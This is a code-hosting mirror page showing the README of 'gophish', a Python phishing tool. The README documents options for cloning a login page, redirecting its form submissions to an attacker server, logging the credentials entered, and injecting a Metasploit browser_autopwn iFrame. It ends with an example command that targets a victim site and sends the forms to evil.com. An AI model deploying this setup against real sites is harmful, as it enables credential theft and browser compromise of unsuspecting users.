Giter Site home page Giter Site logo

tdr130 / gophish Goto Github PK

View Code? Open in Web Editor NEW

This project forked from codewatchorg/gophish

0.0 1.0 0.0 164 KB

GoPhish is a phishing script that enables rapid deployment of phishing sites.

License: BSD 2-Clause "Simplified" License

Python 100.00%

gophish's Introduction

gophish

GoPhish is a phishing script that enables rapid deployment of phishing sites.

Requirements

Mechanize CherryPy BeautifulSoup

Usage

gophish.py [-h] --phish PHISH --replace REPLACE [--logfile LOGFILE] [--listen LISTEN] [--port PORT] [--ssl] [--sslchain SSLCHAIN] [--sslcert SSLCERT] [--sslkey SSLKEY] [--autopwn AUTOPWN] [--autofill AUTOFILL] [--redirect REDIRECT] [--redirectto REDIRECTTO] [--landing LANDING] [--clickthrough CLICKTHROUGH] [--clickable CLICKABLE] [--useragent USERAGENT] [--sendcookies]

Automatically setup a phishing site.

optional arguments:

-h, --help            show this help message and exit

--phish PHISH         the full URL to phish back to the victim (must include
                      http(s)://) (default: None)
--replace REPLACE     the IP/FQDN to replace FORM actions with (must include
                      http(s):// and final /) (default: None)
--logfile LOGFILE     log file to store submitted form values (default:
                      phishlog.txt)
--listen LISTEN       the IP to bind to (default: 0.0.0.0)
--port PORT           the port to start the listening web server on
                      (default: 80)
--ssl                 enable SSL on the running port (default: 0)
--sslchain SSLCHAIN   certificate chain file to use when ssl option is
                      enabled (default: chain.crt)
--sslcert SSLCERT     certificate file to use to use when ssl option is
                      enabled (default: ssl.crt)
--sslkey SSLKEY       private key file to use to use when ssl option is
                      enabled (default: ssl.key)
--autopwn AUTOPWN     Metasploit auxiliary/server/browser_autopwn URL to
                      inject as an iFrame (default: None)
--autofill AUTOFILL   file to use to autosubmit autocomplete fields
                      (default: None)
--redirect REDIRECT   redirect requests for this address somewhere else
                      (default: None)
--redirectto REDIRECTTO
                      redirect requests in the redirect option to this
                      address (full link, must include http(s)://) (default:
                      www.google.com)
--landing LANDING     redirect to this landing page instead of original site
                      after form is submitted (include full link) (default:
                      None)
--clickthrough CLICKTHROUGH
                      file to serve up after user enters form credentials on
                      main phish page (default: None)
--clickable CLICKABLE
                      used in combination with clickthrough, comma separated
                      list of files to serve based on requested name
                      (default: None)
--useragent USERAGENT
                      file to use to pass a user agent value in the request
                      (default: None)
--sendcookies         initiate a connection, get the cookies, send cookies
                      back in second connection (default: 1)

Example: gophish.py --phish https://www.victim.com/login.php --replace https://www.evil.com/ --port 443 --ssl --sslchain chain.crt --sslcert ssl.crt --sslkey ssl.key

gophish's People

Contributors

codewatchorg avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.